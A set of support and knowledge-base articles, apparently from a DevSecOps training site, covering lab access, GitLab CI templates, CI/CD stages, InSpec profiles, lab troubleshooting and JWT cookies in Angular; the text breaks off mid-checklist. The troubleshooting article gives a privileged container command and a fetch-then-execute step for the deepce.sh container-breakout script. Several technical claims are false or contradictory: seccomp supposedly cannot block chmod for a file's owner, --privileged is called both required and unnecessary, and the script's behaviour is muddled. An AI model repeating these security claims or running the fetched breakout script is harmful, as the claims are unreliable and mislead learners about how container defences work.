Technical Support: Response Times, Device Configuration, and GitLab Templates for DevSecOps Learners Welcome to the Practical DevSecOps support hub! Whether you’re setting up a lab environment, waiting for a response from our support team, or looking for a starter GitLab CI/CD template, this guide consolidates the most frequently needed information into one easy‑to‑navigate article. Follow the steps below to avoid common pitfalls, keep your learning momentum, and get the most out of your DevSecOps training. 1. Configuring Your Laptop or Device for Lab Access Why device configuration matters Company‑issued laptops often come with corporate firewalls, proxy settings, or endpoint‑security agents that can unintentionally block traffic to the Practical DevSecOps lab platform. When the lab cannot be reached, exercises stall and valuable learning time is lost. Recommended approach: use a personal device | Benefit | Reason | |---------|--------| | Fewer firewall restrictions | Personal machines typically have fewer outbound rules, reducing the chance of blocked ports. | | Full control over software | You can install required tools (Docker, VS Code, etc.) without needing admin approval. | | Simpler troubleshooting | Issues are easier to isolate when you control the environment. | If you must use a company laptop 1. Check outbound connectivity - Verify that ports 80 (HTTP), 443 (HTTPS), and any custom ports listed in your lab instructions are open. - Use telnet <lab‑url> 443 or curl -I https://<lab‑url> to confirm reachability. 2. Whitelist the lab domain - Request your IT team to add *.practical‑devsecops.com to the firewall’s allowed list. - Provide the exact URLs from the lab guide (e.g., lab.practical-devsecops.com, api.practical-devsecops.com). 3. Disable conflicting VPNs or proxy agents - Some corporate VPNs route all traffic through a gateway that blocks external lab traffic. - Temporarily disconnect from the VPN while working on lab exercises, then reconnect for regular work. 4. Run a quick connectivity test # Test HTTPS access to the lab platform curl -I https://lab.practical-devsecops.com # Expected output: HTTP/2 200 OK If you receive a timeout or 403/502 error, revisit the firewall whitelist step. Scenario: Anna, a new student, kept receiving “Unable to connect to the lab” errors on her corporate laptop. After adding lab.practical-devsecops.com to the corporate firewall whitelist and disabling her VPN, the issue resolved within minutes. 2. How Quickly Can You Expect a Response? Standard response timeline - Typical turnaround: 3 business days from the time you send an email to trainings@practical-devsecops.com. - What counts as a business day? Monday through Friday, excluding public holidays observed by our support team. Tips to accelerate assistance | Action | Impact | |--------|--------| | Provide a clear subject line (e.g., “Lab #3 Docker container fails to start”) | Helps the support queue prioritize your ticket. | | Include environment details – OS version, laptop model, and any error messages | Reduces back‑and‑forth clarification. | | Attach screenshots or logs | Visual context speeds up diagnosis. | | Reference the specific lab or module | Allows the support team to locate the relevant documentation instantly. | Example email: Subject: Lab 5 – GitLab Runner cannot pull Docker image Hi Support, I’m using Windows 10 (v22H2) on a personal laptop. When I run `gitlab-runner exec docker` I receive: ERROR: Failed to pull image “python:3.9-slim”. I’ve verified that port 443 is open and can access https://gitlab.com. Could you advise? Thanks, Mark Following these guidelines often results in a response within 24–48 hours, even though the official SLA is three business days. 3. Getting Started with a Basic GitLab CI/CD Template A solid CI/CD pipeline is the backbone of any DevSecOps workflow. GitLab provides a library of ready‑made templates that you can import directly into your project. Where to find the official templates - URL: https://docs.gitlab.com/ee/development/cicd/templates.html - The page lists templates for languages (Python, Node.js, Java), security scanning (SAST, DAST), and deployment strategies. Minimal “Hello World” pipeline example # .gitlab-ci.yml stages: - build - test - deploy build_job: stage: build image: maven:3.8.5-jdk-11 script: - mvn compile test_job: stage: test image: maven:3.8.5-jdk-11 script: - mvn test deploy_job: stage: deploy image: alpine:latest script: - echo "Deploy step – replace with your own commands" How to use it 1. Create a file named .gitlab-ci.yml at the root of your repository. 2. Copy the snippet above into the file. 3. Commit and push to GitLab; the pipeline will automatically trigger. You can replace the image and script sections with the language or toolset relevant to your lab exercise. Extending the template for security scanning Add a SAST job using GitLab’s built‑in scanner: sast: stage: test image: docker:stable services: - docker:dind script: - echo "Running SAST..." This addition demonstrates how security testing integrates directly into the CI pipeline—core to DevSecOps practice. 4. Common Questions & Quick Tips FAQ - Q: My lab environment still blocks connections after whitelisting the domain. A: Verify that your local antivirus or endpoint protection isn’t intercepting HTTPS traffic. Temporarily disable it for troubleshooting. - Q: Can I expect a faster reply on weekends? A: Support operates Monday‑Friday. Weekend queries are queued and addressed on the next business day. - Q: Do I need to modify the GitLab template for every lab? A: Most labs start with the basic template; only replace the script commands with those specified in the lab instructions. Pro Tips - Bookmark the GitLab template page for quick reference during labs. - Create a “support log” in a shared note (e.g., OneNote) to track questions, timestamps, and resolutions—helpful for future cohorts. - Test connectivity early: Run a simple curl command to the lab URL before diving into complex exercises. 5. Next Steps 1. Configure your device following the checklist in Section 1. 2. Request to a real agent with detailed information as outlined in Section 2. 3. Clone the starter GitLab repository and apply the basic .gitlab-ci.yml template from Section 3. By preparing your environment ahead of time and using the communication best practices described here, you’ll spend less time troubleshooting and more time mastering DevSecOps concepts. Happy learning!

Last updated on Feb 09, 2026

Lab Access & Technical Support: Common Issues and How to Resolve Them

Lab Access & Technical Support: Common Issues and How to Resolve Them Ensuring a smooth learning experience is essential for anyone enrolled in a DevSecOps certification program. Whether you’re waiting for a lab environment to spin up, your course isn’t showing up in the portal, or you’re encountering email delivery problems, this guide walks you through the most frequent technical hurdles and provides step‑by‑step solutions. By following the troubleshooting tips below, you’ll get back on track quickly and keep your study schedule on target. Table of Contents 1. Why Lab Provisioning Takes Time (and What to Expect) 2. My Course Isn’t Visible – What to Do Next 3. Email Delivery Failures When Contacting Support 4. Quick Tips & Frequently Asked Questions Why Lab Provisioning Takes Time The reality of dynamic lab environments Each lab machine is provisioned on demand in a cloud‑based sandbox. Because resources are allocated per‑student, the spin‑up time can vary based on: - Underlying VM image size – Larger images (e.g., full‑stack Kubernetes clusters) need more initialization time. Typical wait times - Standard labs: ≈ 1–2 minutes from the moment you click “Start Lab”. - Complex labs (e.g., multi‑node pipelines): ≈ 4–7 minutes. If you’ve waited at least 3 minutes and still see no access, proceed with the steps below. Step‑by‑step checklist 1. Refresh the Lab Dashboard – Use a hard refresh (Ctrl + F5 or Cmd + Shift + R). 2. Verify your internet connection – A stable connection prevents timeout errors. 3. Check the “Understanding Lab Setup” exercise – The introductory module contains a short video and a troubleshooting checklist that mirrors this scenario. 4. Contact support – If the lab remains unavailable after 5 minutes, Request a real agent on Chat with support feature. Example: Jane, a student in the “Secure CI/CD Pipeline” course, waited 4 minutes, refreshed the dashboard, and then saw the lab appear. She later noted the “Understanding Lab Setup” video had reminded her to allow a 3‑minute buffer. My Course Isn’t Visible – What to Do Next Why a course might not appear immediately When you enroll, a build job is triggered in the background to provision all required resources (labs, assessments, and content modules). This process typically takes 20–30 minutes. During this window, the course may not be listed on your dashboard. How to confirm the build status 1. Check the “My Enrollments” page – A small spinner icon next to the course name indicates an ongoing build. 2. Wait the recommended 20–30 minutes – Most builds complete within this timeframe. 3. Refresh the page – After the wait, a full refresh should display the course. If the course still doesn’t show up - Reach out to support – Use the in‑portal chat or email (see the email section below). Provide: - Your full name and enrollment ID - The exact course title - The timestamp of enrollment - A screenshot of the “My Enrollments” page Scenario: Carlos enrolled in “Infrastructure as Code Security” at 10:15 AM. By 10:40 AM his dashboard still displayed a loading icon. After contacting support with the details above, the team manually triggered a rebuild, and the course appeared within 5 minutes. Email Delivery Failures When Contacting Support Common cause: Outlook or corporate email filters If you receive an error stating that Outlook blocked the delivery of your message to trainings@practical-devsecops.com, it’s usually a policy rule or spam filter on your organization’s mail server. Alternative contact methods 1. Use the secondary address – Send your query to registrations@practical-devsecops.com. This mailbox bypasses most outbound filters. 2. Check your “Sent” folder – Confirm that the email left your outbox. 3. Ask your IT administrator – Request that they whitelist the domain practical-devsecops.com. 4. Use the portal’s Chat with support feature - This will make us get the labs information that you got issue on. Sample email template Subject: Lab Access Issue – [Your Full Name] – Enrollment #12345 Hi Practical DevSecOps Support, I’m experiencing trouble accessing my lab for the “Secure Container Scanning” course. I have waited the recommended 3 minutes, refreshed the dashboard, and still see no lab. My enrollment ID is 12345. Could you please investigate and let me know the next steps? Thank you, [Your Name] [Company / Organization] Quick Tips & Frequently Asked Questions | Question | Quick Answer | |----------|--------------| | How long should I wait for a lab to appear? | Minimum 1 minutes; up to 5 minutes for complex labs. | | My course still isn’t listed after 30 minutes. What now? | Request a help to real agent with enrollment details. | | Outlook blocks my support email – any work‑around? | Use registrations@practical-devsecops.com or the Chat with support feature and ask real agent. | | Can I check the provisioning status? | Yes – look for the spinner icon on the “My Enrollments” page. | | Do I need to restart the lab if it fails to load? | No – first refresh and wait the full buffer time; only restart after support advises. | Pro Tips for a Smooth Experience - Bookmark the “Understanding Lab Setup” exercise – It contains the most up‑to‑date provisioning timelines. - Enable browser notifications – The portal can alert you when a lab is ready. - Add our support domains to your safe‑sender list – Prevents future Outlook blocks. - Keep a copy of your enrollment confirmation email – It includes the enrollment ID needed for faster support. By understanding the typical provisioning timelines, knowing where to look for build status, and using the correct communication channels, you can resolve most Lab Access and Technical Support issues without delay. If you ever find yourself stuck, remember the checklist above and reach out—our team is ready to help you stay on track with your DevSecOps certification journey.

Last updated on Mar 13, 2026

CI/CD Pipeline Stages, Key Differences, and DevSecOps Scan Best‑Practices

CI/CD Pipeline Stages, Key Differences, and DevSecOps Scan Best‑Practices A well‑designed CI/CD pipeline turns raw source code into a reliable, production‑ready application—fast and securely. This article walks you through each pipeline stage, clarifies the often‑confused release, integration, and deploy phases, and shares a practical rule of thumb for security scanning in a DevSecOps environment. Table of Contents 1. The End‑to‑End CI/CD Workflow 2. Stage‑by‑Stage Breakdown with Real‑World Examples - Plan - Build - Test - Release - Integration - Deploy 3. Release vs. Integration vs. Deploy: What Sets Them Apart? 4. DevSecOps Scan Duration Guideline (≤ 10 minutes) 5. Tips & Common Questions The End‑to‑End CI/CD Workflow CI (Continuous Integration) and CD (Continuous Delivery/Deployment) are not single commands; they are a sequence of automated stages that move code from a developer’s IDE to the hands of end users. Each stage adds value, catches defects early, and prepares the artifact for the next step. Key benefit: By automating these stages, teams achieve faster feedback loops, higher release frequency, and consistent security checks. Stage‑by‑Stage Breakdown with Real‑World Examples 1. Plan - Purpose: Capture what will be built and why it matters. - Typical activities: - Create user stories or feature tickets (e.g., JIRA, Azure Boards). - Define acceptance criteria and scope. - Estimate effort and identify dependencies. - Example: A product manager opens a ticket “Add multi‑currency checkout.” The story includes acceptance criteria such as “Support USD, EUR, GBP; display correct conversion rates; reject unsupported currencies.” 2. Build - Purpose: Transform source code into a runnable artifact. - Typical activities: - Resolve dependencies (npm, Maven, pip). - Compile source (e.g., javac, dotnet build). - Package the output (Docker image, JAR, WAR, zip). - Example: A Node.js microservice runs npm ci && npm run build && docker build -t myapp:1.2.0 . The resulting Docker image is stored in a container registry. 3. Test - Purpose: Verify functional, performance, and security quality before anything reaches users. - Typical activities: - Unit tests (JUnit, pytest). - Integration tests (API contract checks). - Static code analysis (SonarQube, ESLint). - Security scans (OWASP Dependency‑Check, Snyk). - Example: The pipeline executes npm test (unit), then runs a Postman collection against a temporary test environment, and finally triggers Snyk to scan for vulnerable npm packages. 4. Release - Purpose: Prepare a stable, versioned package for distribution. - Typical activities: - Tag the source repository (e.g., git tag v1.2.0). - Generate release notes (auto‑extracted from commit messages). - Create a signed artifact (e.g., PGP‑signed JAR). - Optionally run a final regression or user‑acceptance test. - Example: After all tests pass, GitLab creates a release object with a changelog, uploads the Docker image to the production registry, and marks the version as “candidate for production.” 5. Integration - Purpose: Combine code from multiple developers or services and validate that they work together. - Typical activities: - Merge feature branches into a develop or main branch. - Run integration test suites that span multiple services (e.g., contract testing, end‑to‑end UI flows). - Resolve merge conflicts early. - Example: Feature branch feature/payment-gateway is merged into main. A pipeline triggers an integration test that spins up the payment service, order service, and database to verify the complete checkout flow. 6. Deploy - Purpose: Deliver the release artifact to a target environment (staging, canary, or production). - Typical activities: - Execute infrastructure‑as‑code (Terraform, CloudFormation). - Run deployment scripts (Helm, Argo CD, Azure DevOps release). - Perform post‑deployment tasks: DB migrations, feature‑flag toggles, health‑checks. - Example: A GitHub Actions workflow runs helm upgrade --install myapp ./chart --set image.tag=1.2.0 to roll out the new Docker image to a Kubernetes production cluster, then monitors the rollout status. Release vs. Integration vs. Deploy: What Sets Them Apart? | Aspect | Release | Integration | Deploy | |--------|---------|-------------|--------| | Goal | Create a versioned, packaged artifact ready for distribution. | Ensure multiple code changes work together without breaking the system. | Move the approved artifact into a concrete environment (staging/production). | | When it occurs | After successful build and test stages, before any environment change. | Continuously as branches are merged; often parallel to release preparation. | After the release is approved; can be automated for every release or on a schedule. | | Typical outputs | Tags, release notes, signed binaries, artifact registry entries. | Integrated code base, integration‑test reports, resolved merge conflicts. | Running services, updated infrastructure, database schema changes. | | Key tools | Git tagging, GitHub/GitLab Releases, Nexus/Artifactory. | Pull‑request merges, CI merge checks, integration‑test frameworks. | Helm, Argo CD, Azure Pipelines Release, AWS CodeDeploy. | Understanding these boundaries helps teams avoid bottlenecks—e.g., don’t treat a merge conflict as a “release” problem, and don’t run a full production deployment before the release package is formally approved. DevSecOps Scan Duration Guideline (≤ 10 minutes) Security scans are essential, but they must not stall the pipeline. The 10‑minute rule is a practical benchmark: - What it means: The combined runtime of all security‑related jobs (static analysis, dependency scanning, container image scanning, etc.) should stay under 10 minutes for a typical commit. - Why it matters: Long scans increase feedback latency, encourage developers to bypass security checks, and reduce overall delivery speed. - How to achieve it: 1. Select fast tools—many modern scanners (e.g., Trivy, Snyk, OWASP Dependency‑Check) finish in < 3 minutes per job. 2. Parallelize scans—run SAST and container scans in separate jobs that execute concurrently. 3. Scope intelligently—scan only changed files or layers instead of the entire repository each run. 4. Cache results—store previous scan outcomes and re‑use them when code hasn’t changed. If a particular scan consistently exceeds the limit, consider splitting it (e.g., run a quick baseline scan on every PR, then a deeper scan nightly). Tips & Common Questions Tips for a Smooth CI/CD Experience - Keep pipelines declarative (GitLab CI YAML, GitHub Actions workflow files) to make them version‑controlled and auditable. - Fail fast: Stop the pipeline at the first critical error to save time and resources. - Use feature flags to decouple code deployment from feature activation, enabling safer releases. - Monitor pipeline health with dashboards (Grafana, GitLab CI Insights) to spot flaky stages early. Frequently Asked Questions | Question | Answer | |----------|--------| | Do all scans need to be under 10 minutes? | The guideline applies to the total scanning time per pipeline run. Individual scans may be longer if you run them in parallel or on a schedule. | | Can I reuse the same “Release” stage for both staging and production? | Yes—use environment variables or pipeline parameters to differentiate the target (e.g., RELEASE_ENV=staging). | | What’s the difference between “Release” and “Deploy” in GitLab’s default stages? | GitLab’s “release” stage creates a GitLab Release object (tags, changelog). “Deploy” actually pushes the artifact to an environment. | | How do I know if my integration tests are comprehensive enough? | Aim for branch‑coverage ≥ 80 % and include at least one end‑to‑end scenario that spans the critical data flow between services. | By mastering each CI/CD stage, distinguishing release/integration/deploy responsibilities, and keeping security scans within the 10‑minute window, you’ll build pipelines that are fast, reliable, and secure—the cornerstone of modern DevSecOps practice. Happy automating!

Last updated on Jan 07, 2026

Creating and Managing InSpec Profiles – A Practical Guide for DevSecOps Learners

Creating and Managing InSpec Profiles – A Practical Guide for DevSecOps Learners InSpec is the de‑facto standard for automated compliance testing in modern DevSecOps pipelines. Whether you’re troubleshooting a failing control, building a custom profile for a lab, or simply understanding the role of the inspec.yml metadata file, this article walks you through the essential steps, best‑practice tips, and manual remediation techniques you need to succeed. 1. Manually Fixing InSpec Control Failures Automated remediation is ideal, but there are times when you must address a failure by hand—especially during labs or when a quick fix is required on a remote host. The exact steps depend on the type of control that failed. 1.1 Common Failure Types & Manual Fixes | Failure Category | Typical InSpec Message | Manual Remedy (CLI) | Example Command | |------------------|------------------------|---------------------|-----------------| | File Permissions | File /etc/passwd should be mode 0644 | Adjust permissions with chmod | chmod 0644 /etc/passwd | | File Ownership | File /var/log/app.log should be owned by syslog | Change owner/group with chown | chown syslog:adm /var/log/app.log | | Missing File | File /etc/myapp.conf should exist | Create the file (touch, echo, or copy) | touch /etc/myapp.conf | | Service Not Running | Service nginx should be running | Start/enable the service with systemctl | systemctl start nginx && systemctl enable nginx | | Package Not Installed | Package git should be installed | Install via package manager | apt-get install -y git (Debian) or yum install -y git (RHEL) | | Port Not Listening | Port 443 should be listening | Open the port or start the service that binds to it | firewall-cmd --add-port=443/tcp --permanent && firewall-cmd --reload | 1.2 Remote Remediation Workflow 1. Identify the target host – note the hostname or IP from the InSpec run output. 2. SSH into the host: ssh user@target-host 3. Execute the appropriate command (see table above). 4. Re‑run the InSpec profile to confirm the issue is resolved: inspec exec /path/to/profile -t ssh://user@target-host 2. Building a Custom InSpec Profile – Lab 8.5 Walk‑through The “8.5 Lab – How to Create a Custom InSpec Profile” asks you to create a profile named Challenge and later add it to a GitLab repository. Below is a concise step‑by‑step guide. 2.1 Initialise the Profile inspec init profile Challenge The command generates a directory structure similar to: Challenge/ ├─ controls/ │ └─ example.rb ├─ inspec.yml └─ README.md 2.2 Add Variables and Target Host In the lab you used two variables (e.g., app_user and app_port). Define them in controls/example.rb or a dedicated attributes.yml file: # controls/example.rb app_user = input('app_user', value: 'myapp') app_port = input('app_port', value: 8080) describe user(app_user) do it { should exist } end describe port(app_port) do it { should be_listening } end When you run the profile, pass the variables via the CLI or a yaml file: inspec exec Challenge -t ssh://user@host \ --input app_user=deploy --input app_port=9090 2.3 Understanding the “Hint” – No Explicit Target The lab hint uses the check and exec methods inside the Challenge profile. Those methods are generic; they do not embed a specific host. Instead, the target host is supplied at runtime by the GitLab CI job (.gitlab-ci.yml). The CI pipeline defines the INSPEC_TARGET variable, and the job runs: inspec exec Challenge -t $INSPEC_TARGET Therefore, the profile will be evaluated against any host you configure in the pipeline, not just a hard‑coded target. 2.4 Commit and Push to GitLab git add . git commit -m "Add Challenge profile" git push origin main The profile is now part of the repository and will be automatically executed by the compliance job defined in .gitlab-ci.yml. 3. The Role of inspec.yml Every InSpec profile includes an inspec.yml file that stores metadata and configuration. It is the profile’s “identity card” and is used by InSpec, the InSpec Marketplace, and CI/CD tools. 3.1 Core Fields | Key | Description | Example | |-----|-------------|---------| | name | Unique identifier (used when publishing) | my-company/ssh-hardening | | title | Human‑readable title | SSH Hardening Profile | | version | Semantic version of the profile | 1.2.3 | | maintainer | Person or team responsible | DevSecOps Team | | summary | One‑sentence overview | Ensures SSH follows CIS benchmarks | | description | Detailed explanation (optional) | This profile checks ... | | license | SPDX license identifier | Apache-2.0 | | supports | OS families and releases the profile targets | - os-family: linux release: 20.04 | | depends | External profiles this profile relies on | - name: ssh-hardening url: https://github.com/dev-sec/ssh-hardening | 3.2 Why It Matters - Discovery – Tools like the InSpec Marketplace list profiles based on these fields. - Versioning – CI pipelines can enforce a minimum version (>= 1.0.0). - Dependency Management – depends ensures required sub‑profiles are fetched automatically. - Documentation – Readers instantly understand the profile’s purpose without digging into the code. 4. Common Questions & Quick Tips Q1: Can I fix a failing control without writing a script? A: Yes. Use the manual commands listed in Section 1.1. After fixing, re‑run the profile to verify. Q2: Do I need to hard‑code the target host inside the profile? A: No. Provide the target at runtime (CLI, CI variable, or inspec exec -t <target>). This keeps the profile reusable across environments. Q3: What happens if I omit inspec.yml? A: InSpec will still run, but you lose metadata, versioning, and dependency resolution. Publishing to the Marketplace will also fail. Q4: Where can I find more detailed remediation guides? A: - Official InSpec docs – https://www.inspec.io/docs/ - Chef InSpec GitHub Wiki – https://github.com/inspec/inspec/wiki - CIS Benchmarks (PDFs) – https://www.cisecurity.org/cis-benchmarks/ 5. Bottom Line Creating robust InSpec profiles and manually addressing control failures are core skills for any DevSecOps practitioner. By understanding the metadata in inspec.yml, leveraging variables, and knowing exactly how to remediate common failures, you can accelerate lab work, pass certification exams, and bring real‑world compliance automation to production environments. Happy testing!

Last updated on Jan 06, 2026

Common Lab Technical Challenges in DevSecOps — Causes, Solutions, and Best‑Practice Tips

Common Lab Technical Challenges in DevSecOps — Causes, Solutions, and Best‑Practice Tips Introduction Hands‑on labs are the backbone of any DevSecOps certification program. They let learners experiment with container hardening, CI/CD pipelines, and vulnerability‑scanning tools in a safe environment. However, students often encounter roadblocks that can stall progress and create frustration. This article consolidates the most frequently reported lab issues, explains why they happen, and provides clear, step‑by‑step remediation. By understanding the underlying mechanics—such as Linux seccomp profiles, artifact generation, CI/CD replication, and container‑based exploit scripts—you’ll be able to troubleshoot faster and focus on mastering the core concepts of secure software delivery. 1. Seccomp Profile Does Not Block chmod What’s happening? - Owner privilege – In Linux, the file owner can always change file permissions with chmod, regardless of a seccomp filter. - Non‑owner attempts – When a user tries to chmod a file owned by another UID, the seccomp rule you defined (chmod syscall block) becomes effective and the operation is denied. How to verify the behavior # As the file owner (should succeed) touch myfile chmod 600 myfile # works even with seccomp block # Switch to a different user (should be blocked) sudo -u nobody chmod 600 myfile # → Permission denied (seccomp active) Recommended solution 1. Document the limitation in your lab instructions so learners know the rule only applies to non‑owners. 2. Add a non‑owner test case to demonstrate the filter in action. 3. If you need to block chmod for the owner as well, consider using AppArmor or SELinux policies instead of seccomp, because seccomp cannot override file‑ownership semantics. 2. Artifacts Not Generated After Following the Guide Why the simple fix sometimes fails The “artifact not generated” symptom usually stems from deeper pipeline or environment issues, such as: - Missing environment variables required by the build script. - Incomplete dependency installation (e.g., npm install or pip install not executed). - File‑system permission problems that prevent the runner from writing to the output directory. Step‑by‑step troubleshooting checklist | # | Action | Expected Result | |---|--------|-----------------| | 1 | Inspect the job logs for any “permission denied” or “command not found” messages. | Clear error messages pinpointing the failure point. | | 2 | Confirm required variables (e.g., ARTIFACT_PATH, BUILD_MODE) are exported in the pipeline definition. | echo $ARTIFACT_PATH prints a valid directory. | | 3 | Run the build locally inside the same Docker image used by the CI runner. | Artifact appears in the expected location. | | 4 | Check directory permissions (chmod 775 on the output folder). | Runner can write files without error. | | 5 | Re‑trigger the pipeline after fixing any identified issue. | Artifact is produced and archived. | If the problem persists after these steps, revisit the lab’s “deep dive” sections where the underlying container runtime and volume mounting concepts are explained. 3. Replicating Production Machines in CI/CD – Copy‑Paste Pitfalls The common misconception Many learners copy production Dockerfiles or configuration files verbatim into the CI/CD pipeline, assuming the environment will behave identically. In practice, the build context, runtime arguments, and secret handling differ between a live production host and an isolated CI runner. Best‑practice workflow for accurate replication 1. Create a dedicated “ci‑base” image that mirrors the production OS and installed packages but excludes production secrets. 2. Parameterize environment‑specific values (e.g., database URLs, API keys) using CI variables rather than hard‑coding them. 3. Mount only the required volumes in the CI job; avoid copying the entire /etc or /var directories. 4. Validate the image with a quick smoke test before running the full test suite. Example snippet (GitHub Actions) jobs: build-and-test: runs-on: ubuntu-latest container: image: myorg/ci-base:latest env: DB_HOST: ${{ secrets.DB_HOST }} API_TOKEN: ${{ secrets.API_TOKEN }} steps: - uses: actions/checkout@v3 - name: Install dependencies run: ./install.sh - name: Run tests run: ./run-tests.sh By following this pattern, you achieve a faithful production replica while keeping the CI environment secure and reproducible. 4. Running deepce.sh – Understanding the Container Exploit Script What is deepce.sh? deepce.sh is a demonstration script that attempts to privilege‑escalate from a container to its host. It does so by: - Pulling a lightweight Alpine Linux image (the script’s default payload). - Executing a series of known container breakout techniques (e.g., abusing CAP_SYS_ADMIN, mis‑configured mounts). - Reporting whether the container is vulnerable. Proper execution steps 1. Start an interactive shell inside the target container docker run -it --privileged --pid=host --cgroupns=host alpine /bin/sh Note: The --privileged flag is required only for demonstration; real‑world labs use a restricted container to show why the exploit fails. 2. Download and run the script inside that shell wget https://example.com/deepce.sh -O deepce.sh chmod +x deepce.sh ./deepce.sh 3. Interpret the output - Success – The script prints a message like “Host shell obtained!” indicating a vulnerable configuration. - Failure – Errors such as “mount namespace not isolated” show that the container is properly hardened. Why the script pulls an Alpine image The Alpine image serves as a payload that the script tries to execute on the host. If the container is insecure, the payload runs with host privileges, demonstrating the risk. In a secure setup, the download occurs but the payload never gains execution rights. Key takeaway Running deepce.sh inside the container shell is essential. Executing it on the host will only fetch the Alpine image without any exploitation attempt, which explains the confusion many learners experience. Common Questions & Quick Tips | Question | Quick Answer | |----------|--------------| | Can I block chmod for the file owner with seccomp? | No. Seccomp cannot override ownership rights; use MAC frameworks instead. | | Artifacts still missing after fixing permissions? | Verify the CI runner’s working directory and ensure the build script actually writes to the path you’re archiving. | | Is copying production Dockerfiles to CI safe? | Only if you remove secrets and adapt environment variables; otherwise, it can expose credentials. | | Do I need --privileged to run deepce.sh? | For the demo you do not need it; the script is meant to fail on a properly restricted container. | Pro‑Tip Checklist Before Submitting a Lab - ☐ Confirm you are inside the intended container (run cat /proc/1/cgroup). - ☐ Verify environment variables and file permissions match the lab guide. - ☐ Run a dry‑run of the build script locally to catch missing dependencies. - ☐ Review the seccomp JSON to ensure the correct syscalls are blocked. Conclusion Technical hiccups are a natural part of learning DevSecOps, but they also present valuable teaching moments. By understanding the why behind each issue—owner privileges with seccomp, hidden pipeline dependencies, the nuances of reproducing production environments, and the mechanics of container‑breakout scripts—you’ll not only solve the immediate lab problem but also build a stronger foundation for real‑world secure development pipelines. Keep this guide handy, follow the systematic troubleshooting steps, and you’ll turn every obstacle into a learning win.

Last updated on Jan 06, 2026

Managing JWT Cookies, CORS, and Security in Angular Applications

Managing JWT Cookies, CORS, and Security in Angular Applications When building modern Single‑Page Applications (SPAs) with Angular, developers often face the question of how to store and transmit JSON Web Tokens (JWTs) safely. Should the token live in a cookie, in local storage, or be sent in an Authorization: Bearer … header? How do CORS, HttpOnly, SameSite, and the Angular withCredentials flag interact? This article walks you through the security implications, best‑practice patterns, and practical code snippets so you can protect your Angular app from XSS and CSRF attacks while keeping authentication smooth. 1. Why JWTs Are Usually Sent in an Authorization Header - Stateless authentication – The server validates the token on each request without needing a session store. - Clear separation of concerns – Tokens are treated as credentials, not as UI data, so they belong in request headers. - Built‑in support – Most back‑end frameworks (Express, Spring, .NET, etc.) provide middleware that reads Authorization: Bearer <jwt>. If you decide to keep the JWT in a cookie, you must understand the trade‑offs. 2. Storing JWTs in Cookies 2.1 HttpOnly vs. Accessible Cookies | Attribute | Effect | When to use | |-----------|--------|-------------| | HttpOnly | Browser does not expose the cookie to document.cookie or JavaScript. | Ideal for preventing XSS theft of the token. | | No HttpOnly | JavaScript can read the cookie, allowing you to copy it into an Authorization header. | Needed only if the back‑end requires the token in a header and you cannot change that design. Not recommended because it opens XSS risk. | Bottom line: If your API expects the JWT in a header, store the token outside of a cookie (e.g., in memory or a secure storage) or redesign the API to accept the cookie directly. 2.2 SameSite – The First Line of Defense Against CSRF | SameSite value | Browser behavior | Recommended use | |----------------|------------------|-----------------| | Strict | Cookie is sent only for same‑site navigation (no cross‑origin requests). | Best security, but may break legitimate third‑party embeds. | | Lax (default in modern browsers) | Cookie is sent on top‑level GET navigation, but not on POST/PUT/DELETE cross‑origin XHR/fetch. | Good balance for most SPAs. | | None | Cookie is sent on all cross‑origin requests if Secure is also set. | Needed only for true cross‑origin APIs, but must be combined with CSRF tokens. | Setting SameSite=Lax (or Strict) mitigates the classic Cross‑Site Request Forgery (CSRF) scenario where a malicious site forces the browser to submit a request that automatically includes the JWT cookie. 3. Angular’s withCredentials Flag this.http.get('https://api.example.com/profile', { withCredentials: true }) - Purpose – Tells the browser to include cookies, Authorization headers, and TLS client certificates on a cross‑origin request. - When it matters – If your Angular app is served from app.example.com and the API lives on api.example.com, the request is cross‑origin. Without withCredentials: true, the browser won’t send the JWT cookie even if it exists. Important notes 1. Same‑origin requests (e.g., https://app.example.com/api) automatically include cookies; withCredentials is unnecessary. 2. The HttpOnly flag does not affect whether the cookie is sent—only whether JavaScript can read it. The cookie will be attached to every request that matches its domain/path, regardless of withCredentials. 3. CORS pre‑flight – The server must respond with Access-Control-Allow-Credentials: true and explicitly list allowed origins (wildcard * is not allowed when credentials are used). 4. Practical Implementation Scenarios 4.1 Preferred: JWT in HttpOnly Cookie, API Reads Cookie Directly Server (Express example) app.use(cookieParser()); app.get('/api/user', (req, res) => { const token = req.cookies['jwt']; // HttpOnly cookie if (!token) return res.sendStatus(401); // verify token … res.json({ name: 'Alice' }); }); Angular service @Injectable({ providedIn: 'root' }) export class UserService { constructor(private http: HttpClient) {} getProfile() { return this.http.get<User>('/api/user', { withCredentials: true }); } } Cookie attributes: HttpOnly; Secure; SameSite=Lax; Path=/; Result – The JWT never touches JavaScript, eliminating XSS exposure, while withCredentials ensures the cookie is sent on cross‑origin calls. 4.2 When the API Demands a Bearer Header (Legacy) Work‑around (not recommended) 1. Store the token in memory after login (e.g., a service property). 2. Attach it to every request via an HTTP interceptor. @Injectable() export class JwtInterceptor implements HttpInterceptor { constructor(private auth: AuthService) {} intercept(req: HttpRequest<any>, next: HttpHandler) { const token = this.auth.getToken(); // in‑memory, never persisted if (token) { const cloned = req.clone({ setHeaders: { Authorization: `Bearer ${token}` }, }); return next.handle(cloned); } return next.handle(req); } } Security tip: Because the token lives only in memory, a page reload clears it, forcing the user to re‑authenticate—this reduces the window for XSS theft. 5. Defending Against XSS & CSRF 5.1 XSS Mitigation - Content Security Policy (CSP) – Restrict script sources (script-src 'self'), block inline scripts ('unsafe-inline'), and enable nonce‑based scripts. - Framework auto‑escaping – Angular’s template binding ({{ value }}) automatically HTML‑escapes output. Avoid innerHTML unless you sanitize first. - Sanitize user input – Use Angular’s DomSanitizer for any dynamic HTML. 5.2 CSRF Mitigation - SameSite cookies (Lax or Strict) – Primary defense. - Double‑submit cookie – Send a random token in a non‑HttpOnly cookie and echo it in a custom header (X-CSRF-Token). - Anti‑CSRF middleware – Many back‑ends provide built‑in CSRF validation (e.g., csurf for Express). 6. Common Questions & Tips | Question | Answer | |----------|--------| | Do I need withCredentials for same‑origin calls? | No. Browsers automatically include same‑origin cookies. | | Can I set SameSite=None without Secure? | No. Modern browsers reject SameSite=None unless the cookie is also marked Secure. | | What happens if a JWT cookie is HttpOnly and I try to read it in Angular? | You cannot read it via document.cookie. Instead, let the server read the cookie and return the needed data. | | Is storing JWT in localStorage safe? | It is vulnerable to XSS because any script can read localStorage. Prefer HttpOnly cookies when possible. | | How to test CORS with credentials? | Use browser dev tools → Network tab. Look for Access-Control-Allow-Credentials: true in the response and verify the request includes the Cookie header. | Quick checklist before launch - [ ] 